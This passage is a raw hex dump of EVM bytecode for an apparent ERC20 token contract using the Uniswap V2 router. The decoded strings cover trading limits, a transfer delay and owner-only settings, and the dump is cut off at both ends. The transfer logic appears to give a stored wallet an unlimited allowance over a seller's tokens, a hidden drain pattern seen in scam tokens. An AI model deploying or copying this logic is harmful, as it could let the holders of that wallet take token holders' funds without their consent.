0ff1680156121055750601260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156121ac5760075481111561214f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161214690613c2d565b60405180910390fd5b60095461215b83610cab565b8261216691906134b0565b11156121a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219e90613cbf565b60405180910390fd5b61234a565b601360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561224f5750601260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561229e57600754811115612299576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161229090613d51565b60405180910390fd5b612349565b601260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16612348576009546122fb83610cab565b8261230691906134b0565b1115612347576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161233e90613de3565b60405180910390fd5b5b5b5b5b5b600061235730610cab565b90506000600854821015905080801561237c5750600a60029054906101000a900460ff165b80156123955750600660149054906101000a900460ff16155b80156123eb5750601360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124415750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124975750601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156124db576001600660146101000a81548160ff0219169083151502179055506124bf612c2e565b6000600660146101000a81548160ff0219169083151502179055505b6000600660149054906101000a900460ff16159050601160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806125915750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561263f5760009050601360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561263e5761263d600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600d60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000196119c7565b5b5b600080479050821561283257601360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156126b8575060006126b682600f54612ce790919063ffffffff16565b115b156126ec576126e560646126d7600f5489612cfd90919063ffffffff16565b612d1390919063ffffffff16565b915061280e565b601360008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561280d576127666064612758600e5489612cfd90919063ffffffff16565b612d1390919063ffffffff16565b915087600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600d60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b5b6000821115612823576128228830846129af565b5b818661282f9190613e03565b95505b61283d8888886129af565b50505050505b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80601360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612a1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a1590613ea9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a8490613f3b565b60405180910390fd5b612a98838383612d29565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015612b1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b1590613fcd565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612bb191906134b0565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612c1591906131e7565b60405180910390a3612c28848484612d2e565b50505050565b6000612c3930610cab565b905060008103612c495750612ce5565b6014600854612c589190613fed565b811115612c71576014600854612c6e9190613fed565b90505b612c7a81612d33565b601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015612ce2573d6000803e3d6000fd5b50505b565b60008183612cf59190613e03565b905092915050565b60008183612d0b9190613fed565b905092915050565b60008183612d21919061405e565b905092915050565b505050565b505050565b6000600267ffffffffffffffff811115612d5057612d4f61408f565b5b604051908082528060200260200182016040528015612d7e5781602001602082028036833780820191505090505b5090503081600081518110612d9657612d956140be565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612e3b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612e5f9190613565565b81600181518110612e7357612e726140be565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612ed8307f0000000000000000000000000000000000000000000000000000000000000000846119c7565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612f3a9594939291906141ab565b600060405180830381600087803b158015612f5457600080fd5b505af1158015612f68573d6000803e3d6000fd5b505050505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612faa578082015181840152602081019050612f8f565b60008484015250505050565b6000601f19601f8301169050919050565b6000612fd282612f70565b612fdc8185612f7b565b9350612fec818560208601612f8c565b612ff581612fb6565b840191505092915050565b6000602082019050818103600083015261301a8184612fc7565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061305282613027565b9050919050565b61306281613047565b811461306d57600080fd5b50565b60008135905061307f81613059565b92915050565b6000819050919050565b61309881613085565b81146130a357600080fd5b50565b6000813590506130b58161308f565b92915050565b600080604083850312156130d2576130d1613022565b5b60006130e085828601613070565b92505060206130f1858286016130a6565b9150509250929050565b60008115159050919050565b613110816130fb565b82525050565b600060208201905061312b6000830184613107565b92915050565b60006020828403121561314757613146613022565b5b600061315584828501613070565b91505092915050565b6000819050919050565b600061318361317e61317984613027565b61315e565b613027565b9050919050565b600061319582613168565b9050919050565b60006131a78261318a565b9050919050565b6131b78161319c565b82525050565b60006020820190506131d260008301846131ae565b92915050565b6131e181613085565b82525050565b60006020820190506131fc60008301846131d8565b92915050565b60008060006060848603121561321b5761321a613022565b5b600061322986828701613070565b935050602061323a86828701613070565b925050604061324b868287016130a6565b9150509250925092565b61325e81613047565b82525050565b60006020820190506132796000830184613255565b92915050565b600060ff82169050919050565b6132958161327f565b82525050565b60006020820190506132b0600083018461328c565b92915050565b6132bf816130fb565b81146132ca57600080fd5b50565b6000813590506132dc816132b6565b92915050565b600080604083850312156132f9576132f8613022565b5b600061330785828601613070565b9250506020613318858286016132cd565b9150509250929050565b60006020828403121561333857613337613022565b5b6000613346848285016132cd565b91505092915050565b6000806040838503121561336657613365613022565b5b600061337485828601613070565b925050602061338585828601613070565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806133d657607f821691505b6020821081036133e9576133e861338f565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061344b602883612f7b565b9150613456826133ef565b604082019050919050565b6000602082019050818103600083015261347a8161343e565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006134bb82613085565b91506134c683613085565b92508282019050808211156134de576134dd613481565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061351a602083612f7b565b9150613525826134e4565b602082019050919050565b600060208201905081810360008301526135498161350d565b9050919050565b60008151905061355f81613059565b92915050565b60006020828403121561357b5761357a613022565b5b600061358984828501613550565b91505092915050565b60006040820190506135a76000830185613255565b6135b46020830184613255565b9392505050565b6000819050919050565b60006135e06135db6135d6846135bb565b61315e565b613085565b9050919050565b6135f0816135c5565b82525050565b600060c08201905061360b6000830189613255565b61361860208301886131d8565b61362560408301876135e7565b61363260608301866135e7565b61363f6080830185613255565b61364c60a08301846131d8565b979650505050505050565b6000815190506136668161308f565b92915050565b60008060006060848603121561368557613684613022565b5b600061369386828701613657565b93505060206136a486828701613657565b92505060406136b586828701613657565b9150509250925092565b7f596f7520646f206e6f742068617665207065726d697373696f6e20746f20636860008201527f616e67652074686520726f757465722070616972000000000000000000000000602082015250565b600061371b603483612f7b565b9150613726826136bf565b604082019050919050565b6000602082019050818103600083015261374a8161370e565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006137ad602583612f7b565b91506137b882613751565b604082019050919050565b600060208201905081810360008301526137dc816137a0565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061383f602683612f7b565b915061384a826137e3565b604082019050919050565b6000602082019050818103600083015261386e81613832565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006138d1602483612f7b565b91506138dc82613875565b604082019050919050565b60006020820190508181036000830152613900816138c4565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000613963602283612f7b565b915061396e82613907565b604082019050919050565b6000602082019050818103600083015261399281613956565b9050919050565b7f45524332303a207472616e736665722066726f6d20646561642061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006139f5602183612f7b565b9150613a0082613999565b604082019050919050565b60006020820190508181036000830152613a24816139e8565b9050919050565b7f45524332303a207472616e7366657220746f2064656164206164647265737300600082015250565b6000613a61601f83612f7b565b9150613a6c82613a2b565b602082019050919050565b60006020820190508181036000830152613a9081613a54565b9050919050565b7f54726164696e67206e6f7420796574206163746976617465642e000000000000600082015250565b6000613acd601a83612f7b565b9150613ad882613a97565b602082019050919050565b60006020820190508181036000830152613afc81613ac0565b9050919050565b7f5472616e736665722064656c617920697320656e61626c656420746f2070726560008201527f76656e7420736e6970696e672e20204f6e6c79206f6e6520707572636861736560208201527f2070657220626c6f636b20697320616c6c6f7765642e00000000000000000000604082015250565b6000613b85605683612f7b565b9150613b9082613b03565b606082019050919050565b60006020820190508181036000830152613bb481613b78565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d6178696d756d20666f72206f6e65207472616e73616374696f6e2e00000000602082015250565b6000613c17603c83612f7b565b9150613c2282613bbb565b604082019050919050565b60006020820190508181036000830152613c4681613c0a565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d6178696d756d20666f72206f6e652077616c6c657400000000000000000000602082015250565b6000613ca9603683612f7b565b9150613cb482613c4d565b604082019050919050565b60006020820190508181036000830152613cd881613c9c565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d6178696d756d20666f72206f6e65207472616e73616374696f6e2e000000602082015250565b6000613d3b603d83612f7b565b9150613d4682613cdf565b604082019050919050565b60006020820190508181036000830152613d6a81613d2e565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d6178696d756d20666f72206f6e652077616c6c6574000000000000000000602082015250565b6000613dcd603783612f7b565b9150613dd882613d71565b604082019050919050565b60006020820190508181036000830152613dfc81613dc0565b9050919050565b6000613e0e82613085565b9150613e1983613085565b9250828203905081811115613e3157613e30613481565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613e93602583612f7b565b9150613e9e82613e37565b604082019050919050565b60006020820190508181036000830152613ec281613e86565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000613f25602383612f7b565b9150613f3082613ec9565b604082019050919050565b60006020820190508181036000830152613f5481613f18565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613fb7602683612f7b565b9150613fc282613f5b565b604082019050919050565b60006020820190508181036000830152613fe681613faa565b9050919050565b6000613ff882613085565b915061400383613085565b925082820261401181613085565b9150828204841483151761402857614027613481565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061406982613085565b915061407483613085565b9250826140845761408361402f565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61412281613047565b82525050565b60006141348383614119565b60208301905092915050565b6000602082019050919050565b6000614158826140ed565b61416281856140f8565b935061416d83614109565b8060005b8381101561419e5781516141858882614128565b975061419083614140565b925050600181019050614171565b5085935050505092915050565b600060a0820190506141c060008301886131d8565b6141cd60208301876135e7565b81810360408301526141df818661414d565b90506141ee6060830185613255565b6141fb60808301846131d8565b969550505050505056fea26469706673582212205c6993511c31cc52d41e59a91bb671e1e581e8b19c048cb9eae7222bbc32fcbe64736f6c63430008110033

Deployed Bytecode

0x60806040526004361061021e5760003560e01c80637571336a11610123578063bbc0c742116100ab578063e2f456051161006f578063e2f4560514610857578063e884f26014610882578063ec885dc7146108ad578063f2fde38b146108d8578063f8b45b05146109015761027b565b8063bbc0c74214610770578063c02466681461079b578063c876d0b9146107c4578063c8c8ebe4146107ef578063dd62ed3e1461081a5761027b565b806395d89b41116100f257806395d89b41146106655780639a7a23d614610690578063a457c2d7146106b9578063a9059cbb146106f6578063b62496f5146107335761027b565b80637571336a146105de5780638a8c523c146106075780638da5cb5b14610611578063924de9b71461063c5761027b565b806339509351116101a65780634fbee193116101755780634fbee193146104f75780636ddd17131461053457806370a082311461055f578063715018a61461059c578063751039fc146105b35761027b565b806339509351146104395780633ed614bd1461047657806349bd5a5e146104a15780634a62bb65146104cc5761027b565b806318160ddd116101ed57806318160ddd146103505780631d266b281461037b57806323b872dd146103a657806327c8f835146103e3578063313ce5671461040e5761027b565b806306fdde0314610280578063095ea7b3146102ab57806310d5de53146102e85780631694505e146103255761027b565b3661027b57601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661027957600080fd5b005b600080fd5b34801561028c57600080fd5b5061029561092c565b6040516102a29190613000565b60405180910390f35b3480156102b757600080fd5b506102d260048036038101906102cd91906130bb565b6109be565b6040516102df9190613116565b60405180910390f35b3480156102f457600080fd5b5061030f600480360381019061030a9190613131565b6109dc565b60405161031c9190613116565b60405180910390f35b34801561033157600080fd5b5061033a6109fc565b60405161034791906131bd565b60405180910390f35b34801561035c57600080fd5b50610365610a20565b60405161037291906131e7565b60405180910390f35b34801561038757600080fd5b50610390610a2a565b60405161039d91906131e7565b60405180910390f35b3480156103b257600080fd5b506103cd60048036038101906103c89190613202565b610a30565b6040516103da9190613116565b60405180910390f35b3480156103ef57600080fd5b506103f8610b28565b6040516104059190613264565b60405180910390f35b34801561041a57600080fd5b50610423610b2e565b604051610430919061329b565b60405180910390f35b34801561044557600080fd5b50610460600480360381019061045b91906130bb565b610b37565b60405161046d9190613116565b60405180910390f35b34801561048257600080fd5b5061048b610be3565b6040516104989190613264565b60405180910390f35b3480156104ad57600080fd5b506104b6610c09565b6040516104c39190613264565b60405180910390f35b3480156104d857600080fd5b506104e1610c2f565b6040516104ee9190613116565b60405180910390f35b34801561050357600080fd5b5061051e60048036038101906105199190613131565b610c42565b60405161052b9190613116565b60405180910390f35b34801561054057600080fd5b50610549610c98565b6040516105569190613116565b60405180910390f35b34801561056b57600080fd5b5061058660048036038101906105819190613131565b610cab565b60405161059391906131e7565b60405180910390f35b3480156105a857600080fd5b506105b1610cf3565b005b3480156105bf57600080fd5b506105c8610d7b565b6040516105d59190613116565b60405180910390f35b3480156105ea57600080fd5b50610605600480360381019061060091906132e2565b610e1b565b005b61060f610ef2565b005b34801561061d57600080fd5b506106266112a6565b6040516106339190613264565b60405180910390f35b34801561064857600080fd5b50610663600480360381019061065e9190613322565b6112d0565b005b34801561067157600080fd5b5061067a611369565b6040516106879190613000565b60405180910390f35b34801561069c57600080fd5b506106b760048036038101906106b291906132e2565b6113fb565b005b3480156106c557600080fd5b506106e060048036038101906106db91906130bb565b611515565b6040516106ed9190613116565b60405180910390f35b34801561070257600080fd5b5061071d600480360381019061071891906130bb565b611600565b60405161072a9190613116565b60405180910390f35b34801561073f57600080fd5b5061075a60048036038101906107559190613131565b61161e565b6040516107679190613116565b60405180910390f35b34801561077c57600080fd5b5061078561163e565b6040516107929190613116565b60405180910390f35b3480156107a757600080fd5b506107c260048036038101906107bd91906132e2565b611651565b005b3480156107d057600080fd5b506107d9611776565b6040516107e69190613116565b60405180910390f35b3480156107fb57600080fd5b50610804611789565b60405161081191906131e7565b60405180910390f35b34801561082657600080fd5b50610841600480360381019061083c919061334f565b61178f565b60405161084e91906131e7565b60405180910390f35b34801561086357600080fd5b5061086c611816565b60405161087991906131e7565b60405180910390f35b34801561088e57600080fd5b5061089761181c565b6040516108a49190613116565b60405180910390f35b3480156108b957600080fd5b506108c26118bc565b6040516108cf91906131e7565b60405180910390f35b3480156108e457600080fd5b506108ff60048036038101906108fa9190613131565b6118c2565b005b34801561090d57600080fd5b506109166119b9565b60405161092391906131e7565b60405180910390f35b60606003805461093b906133be565b80601f0160208091040260200160405190810160405280929190818152602001828054610967906133be565b80156109b45780601f10610989576101008083540402835291602001916109b4565b820191906000526020600020905b81548152906001019060200180831161099757829003601f168201915b5050505050905090565b60006109d26109cb6119bf565b84846119c7565b6001905092915050565b60126020528060005260406000206000915054906101000a900460ff1681565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600254905090565b600e5481565b6000610a3d848484611b90565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610a886119bf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90613461565b60405180910390fd5b610b1c85610b146119bf565b8584036119c7565b60019150509392505050565b61dead81565b60006012905090565b6000610bd9610b446119bf565b848460016000610b526119bf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610bd491906134b0565b6119c7565b6001905092915050565b601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a60009054906101000a900460ff1681565b6000601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610cfb6119bf565b73ffffffffffffffffffffffffffffffffffffffff16610d196112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610d6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6690613530565b60405180910390fd5b610d796000612848565b565b6000610d856119bf565b73ffffffffffffffffffffffffffffffffffffffff16610da36112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610df9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df090613530565b60405180910390fd5b6000600a60006101000a81548160ff0219169083151502179055506001905090565b610e236119bf565b73ffffffffffffffffffffffffffffffffffffffff16610e416112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610e97576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8e90613530565b60405180910390fd5b80601260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b610efa6119bf565b73ffffffffffffffffffffffffffffffffffffffff16610f186112a6565b73ffffffffffffffffffffffffffffffffffffffff1614610f6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6590613530565b60405180910390fd5b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610fd9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ffd9190613565565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611084573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110a89190613565565b6040518363ffffffff1660e01b81526004016110c5929190613592565b6020604051808303816000875af11580156110e4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111089190613565565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611175600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610e1b565b6111a2600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600161290e565b6111cf307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6000196119c7565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d719343061121630610cab565b6000806112216112a6565b426040518863ffffffff1660e01b8152600401611243969594939291906135f6565b60606040518083038185885af1158015611261573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611286919061366c565b5050506001600a60016101000a81548160ff021916908315150217905550565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6112d86119bf565b73ffffffffffffffffffffffffffffffffffffffff166112f66112a6565b73ffffffffffffffffffffffffffffffffffffffff161461134c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134390613530565b60405180910390fd5b80600a60026101000a81548160ff02191690831515021790555050565b606060048054611378906133be565b80601f01602080910402602001604051908101604052809291908181526020018280546113a4906133be565b80156113f15780601f106113c6576101008083540402835291602001916113f1565b820191906000526020600020905b8154815290600101906020018083116113d457829003601f168201915b5050505050905090565b6114036119bf565b73ffffffffffffffffffffffffffffffffffffffff166114216112a6565b73ffffffffffffffffffffffffffffffffffffffff1614611477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146e90613530565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611507576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114fe90613731565b60405180910390fd5b611511828261290e565b5050565b600080600160006115246119bf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156115e1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115d8906137c3565b60405180910390fd5b6115f56115ec6119bf565b858584036119c7565b600191505092915050565b600061161461160d6119bf565b8484611b90565b6001905092915050565b60136020528060005260406000206000915054906101000a900460ff1681565b600a60019054906101000a900460ff1681565b6116596119bf565b73ffffffffffffffffffffffffffffffffffffffff166116776112a6565b73ffffffffffffffffffffffffffffffffffffffff16146116cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116c490613530565b60405180910390fd5b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161176a9190613116565b60405180910390a25050565b600d60149054906101000a900460ff1681565b60075481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60085481565b60006118266119bf565b73ffffffffffffffffffffffffffffffffffffffff166118446112a6565b73ffffffffffffffffffffffffffffffffffffffff161461189a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161189190613530565b60405180910390fd5b6000600d60146101000a81548160ff0219169083151502179055506001905090565b600f5481565b6118ca6119bf565b73ffffffffffffffffffffffffffffffffffffffff166118e86112a6565b73ffffffffffffffffffffffffffffffffffffffff161461193e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193590613530565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036119ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119a490613855565b60405180910390fd5b6119b681612848565b50565b60095481565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a2d906138e7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611aa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a9c90613979565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611b8391906131e7565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bf690613a0b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611c6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c6590613a77565b60405180910390fd5b60008103611c8757611c82838360006129af565b612843565b600a60009054906101000a900460ff161561234c57611ca46112a6565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611d125750611ce26112a6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611d4b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611d85575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611d9e5750600660149054906101000a900460ff16155b1561234b57600a60019054906101000a900460ff16611e9857601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611e585750601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b611e97576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e8e90613ae3565b60405180910390fd5b5b600d60149054906101000a900460ff161561206257611eb56112a6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015611f3c57507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611f965750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156120615743600b60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541061201c576040517f08c379a000000000000000000000000000000